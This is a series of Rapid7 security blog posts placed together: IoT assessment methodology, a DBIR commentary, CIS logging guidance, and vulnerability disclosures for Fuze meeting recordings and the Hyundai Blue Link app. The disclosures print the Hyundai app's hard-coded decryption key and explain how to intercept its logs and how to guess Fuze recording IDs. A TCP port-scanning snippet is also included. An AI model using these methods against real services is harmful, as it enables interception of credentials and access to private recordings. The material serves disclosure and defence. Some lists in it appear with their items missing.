
By

Deral Heiland - IoT Research Lead, Rapid7

Nathan Sevier - Senior Consultant, Rapid7

Chris Littlebury - Threat Assessment Manager, Rapid7

 

End-to-end ecosystem methodology

When examining IoT technology, the testing focus and methodology is often applied solely to the embedded device. This is short-sighted and incomplete. An effective assessment methodology should consider the entire IoT solution, or as we refer to it, the IoT Product Ecosystem. Every interactive component that makes the product function is included in this IoT Product Ecosystem.

  • Embedded device and associated sensors, receivers, and actuators
  • Mobile application and/or command and control software
  • Cloud APIs and/or associated web services
  • Network communication protocols:
    • Ethernet
    • 802.11 Wi-Fi
    • Intra-component communication such as Zigbee, Z-Wave, Bluetooth, etc.

 


Figure 1: IoT Product Ecosystem

 

Rapid7’s motivation for examining the entire ecosystem is to ensure all components of the technology are secure. Failure of any component of the product ecosystem can and will affect the overall security posture. As an example, a failure in cloud API security can easily lead to unauthorized access to and control of the embedded hardware, allowing a malicious actor to carry out attacks that could potentially impact the safety and security of the product user.

 

In the following sections we discuss the various areas and processes that should be the focus of a thorough assessment of an IoT product ecosystem.

 

Functional evaluation

When conducting a test on an IoT product's ecosystem, first and foremost the product should be set up and configured within normal specifications. We generally prefer to set up two separate environments, which better facilitates vulnerability testing, such as cross-account and cross-system attacks, and can also be used to make comparisons between normal and altered configurations. Leveraging a fully functional environment, we can then more effectively map out all functions, features, components and communication paths within the product's ecosystem. Using this data we can next build out a test plan, which covers the product's ecosystem from end-to-end.

 

Device reconnaissance

We start each IoT security assessment by conducting reconnaissance and open source intelligence gathering (OSINT) to enumerate information about the components and supporting infrastructure. This enumeration can include researching the make and model of the components and software used by the device, and identifying any external presence that makes up the cloud component of the product.

 

Cloud focused testing

IoT technology uses various web services for remote control, data collection, and product management. Often, web services and cloud APIs can be the weakest link within an IoT product ecosystem. To validate their security, we conduct a comprehensive assessment of the associated cloud services, exercising the functions and communication between the cloud services and all components in the product ecosystem. This allows us to validate the overall security posture of the product and determine the impact and risk caused by security issues between components of the ecosystem. This also includes focused testing against the OWASP Top 10.

 

Mobile application/control system-focused testing

IoT technologies commonly leverage various forms of remote control, such as mobile applications (Android, iOS), to remotely manage and control the technology. During this phase of testing we conduct in-depth testing and analysis of the mobile and remote applications used to manage the IoT product. As with the cloud testing, Rapid7 tests all functions and communications between the mobile applications and all components in the product ecosystem to validate the overall security posture of the product. This testing also focuses on the OWASP Mobile Top 10 to ensure the application meets security best practices.

 

Network-focused testing

IoT technologies commonly expose services via standard network communication paths such as Ethernet and Wi-Fi, which can create an elevated level of risk. During this phase of testing, we identify all exposed TCP and UDP ports within the IoT ecosystem's infrastructure. With this list of ports we can then conduct a thorough penetration test to identify all vulnerable or misconfigured services, which could be leveraged to compromise the system and/or gain access to critical information.
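
As a rough illustration of the port-enumeration step, the sketch below checks a device for open TCP ports using only the Python standard library. The target address and port range are placeholders; in practice we use a dedicated scanner (such as Nmap) and cover UDP as well.

    # Minimal sketch of enumerating exposed TCP services on a single IoT device.
    # The target address and port range are placeholders; a full assessment would
    # sweep all 65,535 TCP ports plus UDP with a purpose-built scanner.
    import socket

    TARGET = "192.168.1.50"   # hypothetical device address
    PORTS = range(1, 1025)    # well-known ports only, for brevity

    def open_tcp_ports(host, ports, timeout=0.5):
        found = []
        for port in ports:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                if s.connect_ex((host, port)) == 0:  # 0 means the TCP handshake succeeded
                    found.append(port)
        return found

    if __name__ == "__main__":
        for port in open_tcp_ports(TARGET, PORTS):
            print(f"TCP port {port} is open")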

 

Physical inspection

We also perform a physical inspection to assess the physical attack surface of an IoT device. This inspection includes examining the device for JTAG and Serial pin-outs, as well as identifying the pins used for power, data, and control of individual components. Each device will have different components or elements but some common attack vectors include:

  • Exterior USB Access
  • Exterior port access
  • Location and medium of storage
  • Availability of debug console access
  • Availability of serial console access
  • Efforts required for disassembly of the device
  • Risk to compromise based on brief physical access to the device
  • Risk to compromise based on extended physical access to the device
  • Risk to compromise based on allowed connectivity medium (Wireless, Wired, Bluetooth, etc.)

 

Physical device attacks

Physical inspection of the device is key to identifying the most logical physical attacks. After inspection, we conduct physical tests against the IoT device. Though these attack vectors may differ, they often follow common themes. This testing will typically resemble the following actions:

  • Compromise through available ports.
  • Circumvention of device protections such as boot loader restrictions or a restricted BIOS.
  • Access to modify the configuration of the device.
  • Access to storage to pull configuration keys used by the cloud component.
  • Access to firmware that would otherwise be restricted.
  • Access to the console or logs to isolate traffic destinations during communication with the cloud component.

 

Radio-focused testing

Most IoT devices also use radio-frequency (RF) communication methods. We focus our testing of these communication methods on identifying security issues to help determine risk and impact. To accomplish this we conduct specialized testing and analysis of the radio-based communication to determine whether it:

  • Conforms to expected encryption techniques.
  • Uses component pairing processes that cannot be subverted.
  • Allows unauthorized access or control.
  • Can be easily used to map out the underlying command and control traffic.
  • Is vulnerable to replay attacks.

 

Need help securing your IoT devices? Check out our IoT Security Testing Services to learn more.

How many times have you witnessed security problems caused by a user making bad decisions? I'd venture to guess at least a few dozen if not hundreds. We've all seen where the perfect storm forms through weaknesses in technical controls, user training, and – most often – common sense, and the outcome is not good. Best case, it's ransomware or a similar malware infection. Beyond that, the sky is the limit. Before your organization suffers a breach and has to answer to the news media and lawyers, there's one thing that you have to do: keep your users out of the security decision-making process.

Those of us working in IT and security are not in the business of making people feel good about their jobs. Rather, it's our duty to make sure that everyone is set up for success in day-to-day business processes. Every time you have a user faced with a security decision, such as whether to click a link, set a weak or strong password, or update the software on their computer, you give away your power and put it in the hands of your users – where it does not belong. I understand that it's difficult to manage a network environment, especially when you feel like users are working against your efforts every day. If anything, that should give you that much more of a reason to keep them from making security decisions in the first place.

I don't think it's insensitive or demeaning to keep people from having to make security decisions. They're not security experts. I know, your annual user awareness training session and security policies are supposed to cover all of that, but reality usually tells a different story. Like it or not, people make bad decisions and you have to do what it takes to keep them from doing so. In many cases, you can do this with technology. For example, in the case of passwords, if people are provided with the option to select a weak password, they will – most of the time. Ditto for backing up their data, updating their software, opening attachments, and so on. Throughout history, we have seen that people will, by and large, take the path of least resistance: what's easiest and what's going to get them what they need sooner rather than later. Instant gratification is the name of the game.

Start thinking about how you can set your users, your business, and especially yourself up for success by taking users out of the security equation. Look at your business workflows. Look at your user on-boarding process. Look at your challenges with shadow IT, BYOD, and the like. It's everywhere across your organization. Some things are obvious. Others not so much. But if you look long enough and hard enough you'll find the areas where you need to control things using technologies, process adjustments, or just eliminating the situation altogether. If you continue to ignore this security challenge, your users will continue to make bad security choices, period. That's not what you want. Be proactive. Take charge. I strongly believe that if you spend enough time and effort in this one area of security, you can make huge strides towards minimizing your IT-related business risks.

Since its inception, Rapid7's Project Sonar has aimed to share the data and knowledge we've gained from our Internet scanning and collection activities with the larger information security community.  Over the years this has resulted in vulnerability disclosures, research papers, conference presentations, community collaboration and data.  Lots and lots of data.

 

Thanks to our friends at scans.io, Censys, and the University of Michigan, we've been able to provide the general public free access to much of our data, including:

 

 

As Project Sonar continues, we will continue to publish our data through the outlets listed above, perhaps in addition to others.

 

Are you interested in Project Sonar?  Are you using this data?  If so, how?  Interested in seeing additional studies performed?  Have questions about the existing studies or how to use or interpret the data?  We love hearing from the community!  Post a comment below or reach out to us at research [at] rapid7 [dot] com.

The much-anticipated, tenth-anniversary edition of the Verizon DBIR has been released (http://www.verizonenterprise.com/verizon-insights-lab/dbir/2017/), once again providing a data-driven snapshot into what topped the cybercrime charts in 2016. There are just under seventy-five information-rich pages to go through, with topics ranging from distributed denial-of-service (DDoS) to ransomware, prompting us to spin a reprise edition of last year’s DBIR field guide (https://community.rapid7.com/community/infosec/blog/2016/04/29/the-2016-verizon-data-breach-investigations-report-the-defenders-perspective).

 

Before we bust out this year’s breach-ography, let’s set a bit of context.

 

The Verizon DBIR is digested by a diverse community, but the lessons found within are generally aimed at defenders in organizations who are faced with the unenviable task of detecting and deterring the daily onslaught of attacks and attackers. This post is also aimed at that audience. As you go through the Verizon DBIR, there should be three guiding principles at work:

 

 

Time to fire up the jukebox and see what’s inside.

 

The Detection-Deficit is Dead…Long Live the Defender’s Differential!

 

The first chart I always went to in the DBIR was the Detection-Deficit chart. Said chart “compared the percentage of breaches where the time-to-compromise was days or less against the percentage of breaches where the time-to-discovery was days or less.” (VZDBIR, pg 8). It’s also no longer an artifact in the Verizon DBIR.

 

The Verizon Security Research team provided many good reasons for not including the chart in the report, and also noted several caveats about the timings that you should take time to consider. But, you still need to be tracking similar metrics in your own organization to see if things are getting better or worse (things rarely hold steady in infosec land).  We’ve taken a cue from the DBIR and used their data to give you two new metrics to track: the “Exfiltration-Compromise Differential”

Verizon DBIR Summary: Exfiltration Chart

and the “Containment-Discovery Differential”.

Verizon DBIR Summary: Containment Chart

The former chart shows a band created by comparing the percentage of breaches where exfiltration (you can substitute or add in other accomplished attacker goals) was in “days or less” (in other words, less than seven days) to the percentage where initial compromise was “days or less”. This band should be empty (all attacker events took days or longer) or as tiny as possible.
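
If you want to track a similar metric internally, the minimal sketch below computes both percentages and the width of the band from your own incident records. The field names, sample values, and the seven-day threshold are illustrative assumptions; align them with how your IR team actually records timings.

    # Sketch of tracking the "Exfiltration-Compromise Differential" from your own
    # incident records. Field names, sample values, and the seven-day threshold
    # are illustrative assumptions.
    FAST = 7  # "days or less" threshold, in days

    incidents = [
        {"time_to_compromise": 1,  "time_to_exfiltration": 3},
        {"time_to_compromise": 2,  "time_to_exfiltration": 30},
        {"time_to_compromise": 14, "time_to_exfiltration": 60},
    ]

    def pct_within(records, field, threshold=FAST):
        hits = sum(1 for r in records if r[field] <= threshold)
        return 100.0 * hits / len(records)

    compromise_fast = pct_within(incidents, "time_to_compromise")
    exfil_fast = pct_within(incidents, "time_to_exfiltration")
    print(f"Initial compromise in days or less: {compromise_fast:.0f}%")
    print(f"Exfiltration in days or less: {exfil_fast:.0f}%")
    print(f"Differential band width: {abs(compromise_fast - exfil_fast):.0f} points")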

 

The latter does the same to compare the defender’s ability to detect and contain attacker activity. That band needs to be as YUGE as you can make it (aligned to your organization’s risk and defense spending appetites).

 

As noted in the Verizon DBIR, things aren’t getting much better (or worse) when looked at in aggregate, but I’m hopeful that organizations can make progress in these areas as tools, education, techniques and processes continue to improve.

 

Some other key takeaways in the “Breach Trends” section include:

 

  • The balance between External and Internal actors has ebbed and flowed at about the same pace for the past 7 years, meaning Figure 2 does not validate the ever-present crusade by your Internal Audit department to focus solely on defending against rogue sysadmins. There is a cautionary tale here, though, in that many of the attacks marked as “internal” were actually committed by external attackers who used legit credentials to impersonate internal users.
  • We have finally reached the Threat Action Trifecta stage with Social, Malware and Hacking reigning supreme (and will likely do so for some time to come).
  • Financial gain and stealing secrets remain primary motives (and defending against those who seek your secrets may become job #1 over the coming years if Figure 3 continues the trend).

 

Team DBIR also provided a handy punch-card for you in Figure 9:

 

Verizon Data Breach Investigation Report Summary: Figure 9

It’s your “at-a-glance” key to the 2016 chart-toppers by industry. Keep it handy as you sit in your post-DBIR-launch roadmap adjustment meetings (you do have those, right?).

 

The Secret Life of Enterprise Vulnerability Management (Guest starring IoT)

 

Verizon has many partners who provide scads of vulnerability data, and the team took a very interesting look at  patching in the intro section preceding the individual industry dives.

Verizon DBIR Summary: Figure 14

Verizon gives a solid, technical explanation of this chart, so we’ll focus on how you should benchmark your own org against it.

 

Find your industry (NAICS codes are here: https://www.census.gov/eos/www/naics/ but you can also Google™ “COMPANY_NAME NAICS” and usually get a quick result) on the right, then hit up your vulnerability and patch management dashboards to see if you meet or beat expectations. If you’re a college, do you patch more than 12% of vulns in 12 weeks’ time? If you’re in a hospital, do you meet the 77% bar?

 

The chart is based on real data from many organizations. You may have some cognitive dissonance reading it because we constantly hear how awesome, well-resourced financial institutions are at IT & security and the converse for industries such as Healthcare. One way to validate these findings is to start tracking this data internally, then getting your ISAC partners (you are aligned with one — or more — information sharing and analysis centers, right?) to do the same and compare notes a few times a year. You also need to define your own targets and use your hit/miss ratio as a catalyst for process improvement (or funding for better tooling).

 

But wait…there’s more!

 

Verizon DBIR Summary: Figure 56

Keep one finger on page 13 and then flip to Appendix B to get even more information on vulnerability management, including this chart.

 

Network ops folks patching on 90-day cycles shouldn’t really surprise anyone - we need to keep those bits and bytes flowing, and error-free high-availability switchover capability is expensive - but take a look at the yellow-ish line. First, do you even track IoT (Internet of Things, i.e. embedded) patching? And, if you do — or, when you start to after reading this — will you strive to do better than the “take 100 days to not even get half the known vulns patched”?

 

IoT is a blind-spot in many (most) organizations and this chart is a great reminder that you need to:

 

  • care about
  • inventory/locate, and
  • track

 

IoT in your environment.

 

Industrial Development

 

Unfortunately, digesting the various Industry sections of the Data Breach Investigations Report is an exercise that you must — dear reader — undertake on your own, but they are a good resource to have for planning or security architecture development sessions.

 

Find your industry (see the previous section in this post), note the breach frequency (they’ll likely have fixed the bug in the Accommodation section by the time our blog post drops), top patterns, actor information and compromise targets and compare your 2016 to the overall industry 2016. Note the differences (or similarities) and adjust accordingly.

 

The DBIR team provides unique details and content in each industry section to help you focus on the differentials (the unique incident characteristics that made one industry different from the others). As you go through each, do not skip over the caveats. The authors of the report spend a great deal of time sifting through details and will often close out a section with important information that may change your perspective on a given area, such as this closing caveat in the Retail section: “This year we do not have any large retailers in the Point of Sale Intrusions pattern, which is hopefully an indicator of improvements and lessons learned. We are interested in finding out if smaller retailers also learned this lesson, or if single small breaches just aren’t making it into our dataset.”

 

The Last Waltz: Dancing Through Incident Classification Patterns

 

We’ll close with an overview of the bread-and-butter (or, perhaps, avocado toast?) of the DBIR: the incident classification patterns. Figures 33 & 34 provide the necessary contextual overview:

Verizon DBIR Summary: Figure 33

Breaches hurt, but incidents happen with more regularity, so you need to plan for both. First, compare overall prevalence for each category to what your own org saw in 2016 so you understand your own, unique view.

 

Next, make these sections actionable. One of the best ways to get the most out of the data in each of the Patterns sections is to take one or two key details from each that matter to your industry (they align the top ones in each category) and design either tabletop or actual red-team exercise scenarios that your org can run through.

 

For example, design a scenario where attackers have obtained a recent credential dump and have targeted your employee HR records (yes, I took the easy one from Figure 52, page 58). MITRE has a decent “Cyber Exercise Playbook” (https://www.mitre.org/sites/default/files/publications/pr_14-3929-cyber-exercise-playbook.pdf) you can riff off of if you don’t have one of your own to start with.

 

Coda

 

This is the first year Rapid7 has been a part of the DBIR corpus, and we want to end with a shout-out to the entire DBIR team for taking the time to walk through our incident/breach-data contributions with us. We look forward to contributing more — and more diverse — data in reports to come.

This post describes a security vulnerability in the Fuze collaboration platform, and the mitigation steps that have been taken to correct the issue. The Fuze collaboration platform did not require authentication to access meeting recordings (CWE-284). Shortly after being informed of this issue, Fuze disabled public access to all recorded meetings, and implemented user-configurable controls in the client application to mediate public access to shared meeting recordings. Affected recordings that had already been shared were reviewed and addressed as well. Rapid7 thanks Fuze for their timely and thoughtful response to this issue.

Product Description

Fuze is an enterprise, multi-platform voice, messaging, and collaboration service created by Fuze, Inc. It is described fully at the vendor's website. While much of the Fuze suite of applications are delivered as web-based SaaS components, there are endpoint client applications for a variety of desktop and mobile platforms.

Credit

This issue was discovered by Samuel Huckins of Rapid7 (that's me), and is being disclosed in accordance with Rapid7's vulnerability disclosure policy.

Exploitation

Recorded Fuze meetings are saved to Fuze's cloud hosting service. They could be accessed by URLs such as "https://browser.fuzemeeting.com/?replayId=7DIGITNUM", where "7DIGITNUM" is a seven digit number that increments over time. Since this identifier did not provide sufficient keyspace to resist bruteforcing, specific meetings could be accessed and downloaded by simply guessing a replay ID reasonably close to the target, and iterating through all likely seven digit numbers. This format and lack of authentication also allowed one to find recordings via search engines such as Google.
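
To put the keyspace problem in perspective, here is a back-of-the-envelope sketch. The request rate is a hypothetical figure, but it shows why seven sequential digits are not a meaningful access control.

    # Rough estimate of how long a full sweep of a seven-digit ID space would take.
    # The request rate is an assumed figure for a single unthrottled client.
    KEYSPACE = 10 ** 7          # all possible seven-digit replay IDs
    REQUESTS_PER_SECOND = 50

    seconds = KEYSPACE / REQUESTS_PER_SECOND
    print(f"Full sweep of {KEYSPACE:,} IDs at {REQUESTS_PER_SECOND} req/s: ~{seconds / 3600:.1f} hours")
    # Because the IDs increment over time, targeting a recent meeting only requires
    # trying a small window around the current counter value, which takes minutes.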

Vendor Statement

Security is a top priority for Fuze and we appreciate Rapid7 identifying this issue and bringing it to our attention. When we were informed by the Rapid7 team of the issue, we took immediate action and have resolved the problem.

Remediation

As of Mar 1, 2017, all meeting recordings now appear to require password authentication in order to be viewed from Fuze's cloud-hosted web application via direct browsing or from the Fuze desktop and mobile clients. This authentication control is configurable by the user via the client applications as of version 4.3.1 (released on Mar 10, 2017). Fuze users are encouraged to update their Fuze client applications in order to take advantage of new access controls. Additional options, such as downloading the recording locally, are available at https://account.fuzemeeting.com/#/recordings.

Disclosure Timeline

  • Thu, Feb 23, 2017: Discovered by Samuel Huckins of Rapid7.

  • Mon, Feb 27, 2017: Vulnerability verified by Rapid7.

  • Mon, Feb 27, 2017: Vulnerability details disclosed to Fuze.

  • Wed, Mar 01, 2017: Fuze disabled public access to meeting recordings.

  • Fri, Mar 10, 2017: Version 4.3.1 of Fuze endpoint client released, providing authentication controls for recorded meetings.

  • Tue, Mar 15, 2017: Vulnerability details disclosed to CERT/CC.

  • Tue, Mar 21, 2017: VU#590023 assigned by CERT/CC to track this issue.

  • Tue, Apr 25, 2017: CERT/CC and Rapid7 decided not to issue a CVE for this vulnerability. The issue was primarily on Fuze's servers, thus the end user didn't have to take any actions, and the issue has already been corrected.

  • Tue, May 02, 2017: Disclosed to the public

Summary

Due to a reliance on cleartext communications and the use of a hard-coded decryption password, two outdated versions of Hyundai Blue Link application software, 3.9.4 and 3.9.5, potentially expose sensitive information about registered users and their vehicles, including application usernames, passwords, and PINs via a log transmission feature. This feature was introduced in version 3.9.4 on December 8, 2016, and removed by Hyundai on March 6, 2017 with the release of version 3.9.6.

Affected versions of the Hyundai Blue Link mobile application upload application logs to a static IP address over HTTP on port 8080. The log is encrypted using a symmetric key, "1986l12Ov09e", which is hard-coded in the Blue Link application (specifically, C1951e.java) and cannot be modified by the user.

Once decoded, the logs contain personal information, including the user's username, password, PIN, and historical GPS data about the vehicle's location. This information can be used to remotely locate, unlock and start the associated vehicle.

This vulnerability was discovered by Will Hatzer and Arjun Kumar, and this advisory was prepared in accordance with Rapid7's disclosure policy.

Product Description

The Blue Link app is compatible with 2012 and newer Hyundai vehicles. The functionality includes remote start, location services, unlocking and locking associated automobiles, and other features, documented at the vendor's web site.

Credit

This vulnerability was discovered by independent researchers William Hatzer and Arjun Kumar.

Exploitation for R7-2017-02

The potential data exposure can be exploited one user at a time via passive listening on insecure WiFi, or by standard man-in-the-middle (MitM) attack methods to trick a user into connecting to a WiFi network controlled by an attacker on the same network as the user. If this is achieved, an attacker would then watch for HTTP traffic directed at an HTTP site at 54.xx.yy.113:8080/LogManager/LogServlet, which includes the encrypted log file with a filename that includes the user's email address.

It would be difficult to impossible to conduct this attack at scale, since an attacker would typically need to first subvert physically local networks, or gain a privileged position on the network path from the app user to the vendor's service instance.

Vendor Statement

Hyundai Motor America (HMA) was made aware of a vulnerability in the Hyundai Blue Link mobile application by researchers at Rapid7. Upon learning of this vulnerability, HMA launched an investigation to validate the research and took immediate steps to further secure the application. HMA is not aware of any customers being impacted by this potential vulnerability.

 

The privacy and security of our customers is of the utmost importance to HMA. HMA continuously seeks to improve its mobile application and system security. As a member of the Automotive Information Sharing Analysis Center (Auto-ISAC), HMA values security information sharing and thanks Rapid7 for its report.

Remediation

On March 6, 2017, the vendor updated the Hyundai Blue Link app to version 3.9.6, which removes the LogManager log transmission feature. In addition, the TCP service at 54.xx.yy.113:8000 has been disabled. The mandatory update to version 3.9.6 is available in both the standard Android and Apple app stores.

Disclosure Timeline

  • Tue, Feb 02, 2017: Details disclosed to Rapid7 by the discoverer.
  • Sun, Feb 19, 2017: Details clarified with the discoverer by Rapid7.
  • Tue, Feb 21, 2017: Rapid7 attempted contact with the vendor.
  • Sun, Feb 26, 2017: Vendor updated to v3.9.5, changing LogManager IP and port.
  • Mon, Mar 02, 2017: Vendor provided a case number, Consumer Affairs Case #10023339
  • Mon, Mar 06, 2017: Vendor responded, details discussed.
  • Mon, Mar 06, 2017: Version 3.9.6 released to the Google Play store.
  • Wed, Mar 08, 2017: Version 3.9.6 released to the Apple App Store.
  • Wed, Mar 08, 2017: Details disclosed to CERT/CC by Rapid7, VU#152264 assigned.
  • Wed, Apr 12, 2017: Details disclosed to ICS-CERT by Rapid7, ICS-VU-805812 assigned.
  • Fri, Apr 21, 2017: Details validated with ICS-CERT and HMA, CVE-2017-6052 and CVE-2017-6054 assigned.
  • Tue, Apr 25, 2017: Public disclosure of R7-2017-02 by Rapid7.
  • Tue, Apr 25, 2017: ICSA-17-115-03 published by ICS-CERT.
  • Fri, Apr 28, 2017: Redacted the now-disabled IP address for the LogManager IP address.

In your organizational environment, Audit Logs are your best friend. Seriously. This is the sixth blog of the series based on the CIS Critical Security Controls. I’ll be taking you through Control 6: Maintenance, Monitoring and Analysis of Audit Logs, to help you understand the need to nurture this friendship and how it can bring your information security program to a higher level of maturity while helping you gain visibility into the deep, dark workings of your environment.

 

In the case of a security event or incident, real or perceived, and whether it takes place due to one of the NIST-defined incident threat vectors or falls into the “Other” category, having the data available to investigate and effectively respond to anomalous activity in your environment is not only beneficial, but necessary.

 

What this Control Covers:

This control has six sections which cover everything from NTP configuration to verbose logging of traffic from network devices, how the organization can best leverage a SIEM for a consolidated view and action points, and how often reports need to be reviewed for anomalies.


 

There are many areas where this control runs alongside or directly connects to some of the other controls as discussed in other CIS Critical Control Blog posts.

 

How to Implement It:

Initial implementation of the different aspects of this control range in complexity from a “quick win” to full configuration of log collection, maintenance, alerting and monitoring.

 

Network Time Protocol: Here’s your quick win. By ensuring that all hosts on your network are using the same time source, event correlation can be accomplished in a much more streamlined fashion. We recommend leveraging the various NTP pools that are available, such as those offered by pool.ntp.org. Having your systems check in to a single regionally available server on your network, which has obtained its time from the NTP pool, will save you hours of chasing down information.
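
As a quick sanity check of a host's clock against the pool, something like the sketch below works with only the Python standard library. The server name and the one-second tolerance are assumptions for illustration; in production you would rely on your NTP and monitoring tooling instead.

    # Minimal SNTP query to compare a host's clock against an NTP pool server.
    # The server name and drift tolerance are placeholders for illustration.
    import socket
    import struct
    import time

    NTP_SERVER = "pool.ntp.org"
    NTP_EPOCH_OFFSET = 2208988800  # seconds between 1900-01-01 and 1970-01-01

    def ntp_time(server=NTP_SERVER):
        packet = b"\x1b" + 47 * b"\0"  # LI=0, version 3, mode 3 (client request)
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.settimeout(5)
            s.sendto(packet, (server, 123))
            data, _ = s.recvfrom(48)
        transmit_seconds = struct.unpack("!I", data[40:44])[0]  # transmit timestamp
        return transmit_seconds - NTP_EPOCH_OFFSET

    if __name__ == "__main__":
        drift = abs(ntp_time() - time.time())
        print(f"Clock drift vs {NTP_SERVER}: {drift:.1f} seconds")
        if drift > 1.0:  # assumed tolerance; tune to your environment
            print("Warning: host clock drift may skew event correlation")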

 

Reviewing and Alerting: As you can imagine, there is a potential for a huge amount of data to be sent over to your SIEM for analysis and alerting. Knowing what information to capture and retain is a huge part of the initial and ongoing configuration of the SIEM.

 

Fine tuning of alerts is a challenge for a lot of organizations. What is a critical alert? Who should be receiving these and how should they be alerted? What qualifies as a potential security event? SIEM manufacturers and Managed Service Providers have their pre-defined criteria and, for the most part, are able to define clear use cases for what should be alerted upon; however, your organization may have additional needs. Whether these needs are the result of compliance requirements or of needing to keep an eye on a specific critical system for anomalous activity, defining your use cases and ensuring that alerts are sent for the appropriate level of concern, and to the appropriate resources, is key to avoiding alert fatigue.
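
To make the idea of a use case concrete, here is a toy, product-agnostic sketch of a common threshold rule: alert when one account racks up too many failed logons in a short window. The event structure, field names, and thresholds are all illustrative assumptions; most SIEMs express the same logic in their own rule language.

    # Toy threshold rule: alert when one account exceeds N failed logons in W minutes.
    # The event structure and thresholds are illustrative, not tied to any product.
    from collections import defaultdict
    from datetime import datetime, timedelta

    FAILED_LOGON_LIMIT = 10
    WINDOW = timedelta(minutes=5)

    events = [
        # hypothetical normalized events pulled from the SIEM
        {"time": datetime(2017, 5, 1, 9, 0, 0), "user": "jsmith", "action": "logon_failed"},
        # ...
    ]

    def burst_alerts(events):
        by_user = defaultdict(list)
        for e in sorted(events, key=lambda e: e["time"]):
            if e["action"] != "logon_failed":
                continue
            by_user[e["user"]].append(e["time"])
            # keep only failures inside the sliding window
            recent = [t for t in by_user[e["user"]] if e["time"] - t <= WINDOW]
            by_user[e["user"]] = recent
            if len(recent) >= FAILED_LOGON_LIMIT:
                yield f"ALERT: {e['user']} had {len(recent)} failed logons within {WINDOW}"

    for alert in burst_alerts(events):
        print(alert)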


Events that may not require immediate notification still have to be reviewed. Most regulatory requirements state that logs should be reviewed "regularly" but remain vague on what this means. A good rule of thumb is to have logs reviewed on a weekly basis, at a minimum. While your SIEM may have the analytical capabilities to draw correlations, there will undoubtedly be items that you find that will require action.

 

What should I be collecting?

There is a lot of technology out there to “help” secure your environment, everything from Active Directory auditing tools that let you pull nicely formatted, predefined reports to network configuration management tools. All of these do things your SIEM can do with appropriately managed alerting and reporting; the SIEM should be able to be a one-stop shop for your log data.

In a perfect world, where storage isn’t an issue, each of the following items would have security related logs sent to the SIEM.

  • Network gear
    • Switches
    • Routers
    • Firewalls
    • Wireless Controllers and their APs.
  • 3rd Party Security support platforms
    • Web proxy and filtration
    • Anti-malware solutions
    • Endpoint Security platforms (HBSS, EMET)
    • Identity Management solutions
    • IDS/IPS
  • Servers
    • Special emphasis on any system that maintains an identity store, including all Domain Controllers in a Windows environment.
    • Application servers
    • Database servers
    • Web Servers
    • File Servers – Yes, even in the age of cloud storage, file servers are still a thing, and access (allowed or denied) needs to be logged and managed.
  • Workstations
    • All security log files

 

This list is by no means exhaustive, and even at the level noted we are talking about large volumes of information. This information needs a home. This home needs to be equipped with adequate storage and alerting capabilities.
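
For systems or applications that can't ship their logs natively, a lightweight forwarder can relay security-relevant events to the central collector. The sketch below uses Python's standard syslog handler; the collector hostname, port, and event fields are placeholders, and in practice a native agent (rsyslog, NXLog, Windows Event Forwarding, etc.) is usually the better fit.

    # Minimal sketch of forwarding application security events to a central
    # syslog/SIEM collector over UDP. "siem.example.com" and port 514 are placeholders.
    import logging
    import logging.handlers

    handler = logging.handlers.SysLogHandler(address=("siem.example.com", 514))
    handler.setFormatter(logging.Formatter("appserver01 %(name)s: %(message)s"))

    security_log = logging.getLogger("security")
    security_log.setLevel(logging.INFO)
    security_log.addHandler(handler)

    # Example events an application server might emit for central review
    security_log.info("user=jdoe action=file_access path=/finance/q2.xlsx result=denied")
    security_log.warning("user=admin action=config_change item=firewall_rule result=success")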

 

Local storage is an alternative, but it will not provide the correlation, alerting, or retention capabilities of a full-blown SIEM implementation.

 

There has been some great work done in helping organizations refine what information to include in log collections. Here are a few resources I have used.

 

SANS - https://www.sans.org/reading-room/whitepapers/auditing/successful-siem-log-management-strategies-audit-compliance-33528

 

NIST SP 800-92 - http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-92.pdf

 

Malware Archaeology - https://www.malwarearchaeology.com/cheat-sheets/

 

 

Read more on the CIS Critical Security Controls:

 

What are the CIS Critical Security Controls?

 

The Center for Internet Security (CIS) Top 20 Critical Security Controls (previously known as the SANS Top 20 Critical Security Controls), is an industry-leading way to answer your key security question: “How can I be prepared to stop known attacks?” The controls transform best-in-class threat data into prioritized and actionable ways to protect your organization from today’s most common attack patterns.

 

Achievable Implementation of the CIS Critical Security Controls

 

The interesting thing about the critical security controls is how well they scale to work for organizations of any size, from very small to very large. They are written in easy-to-understand business language, so non-security people can easily grasp what they do. They cover many parts of an organization, including people, processes and technology. As a subset of the priority 1 items in the NIST 800-53 special publication, they are also highly relevant and complementary to many established frameworks.

 

Leveraging Rapid7's expertise to assist your successful implementation

 

As part of a Rapid7 managed services unit, the Security Advisory Services team at Rapid7 specializes in security assessments for organizations. Using the CIS Critical Security Controls (formerly the SANS 20 Critical Controls) as a baseline, the team assesses and evaluates strengths and gaps, and makes recommendations on closing those gaps.

 

The Security Advisory Services team will be posting a blog series on each of the controls. These posts are based on our experience over the last two years of our assessment activity with the controls, and how we feel each control can be approached, implemented and evaluated. If you are interested in learning more about the CIS Critical Controls, stay tuned here as we roll out posts weekly. Thanks for your interest and we look forward to sharing our knowledge with you!

 

The definitive guide of all CIS Critical Security Controls

As the blog series expands, we’ll use this space to keep a running total of all the 20 CIS Critical Controls. Check back here to stay updated on each control.

 

Control 1: Inventory of Authorized and Unauthorized Devices

This control is split into 6 focused sections relating to network access control, automation and asset management. The control specifically addresses the need for awareness of what’s connected to your network, as well as the need for proper internal inventory management and management automation. Implementing inventory control is probably the least glamorous way to improve a security program, but if it's done right it reduces insider threat and loss risks, cleans up the IT environment and improves the other 19 controls. Learn more.

 

Control 2: Inventory of Authorized and Unauthorized Software

The second control is split into 4 sections, each dealing with a different aspect of software management. Much like Control 1, this control addresses the need for awareness of what’s running on your systems and network, as well as the need for proper internal inventory management. The CIS placed these controls as the "top 2" in much the same way that the NIST Cybersecurity Framework addresses them as "priority 1" controls on the 800-53 framework; inventory and endpoint-level network awareness is critical to decent incident response, protection and defense. Learn more.

Control 3: Secure Configurations for Hardware & Software

This control deals with Secure Configurations for Hardware & Software. The Critical Controls are numbered in a specific way, following a logical path of building foundations while you gradually improve your security posture and reduce your exposure. Controls 1 and 2 are foundational to understanding what inventory you have. The next step, Control 3, is all about shrinking that attack surface by securing the inventory in your network. Learn more.

 

Control 4: Continuous Vulnerability Assessment & Remediation

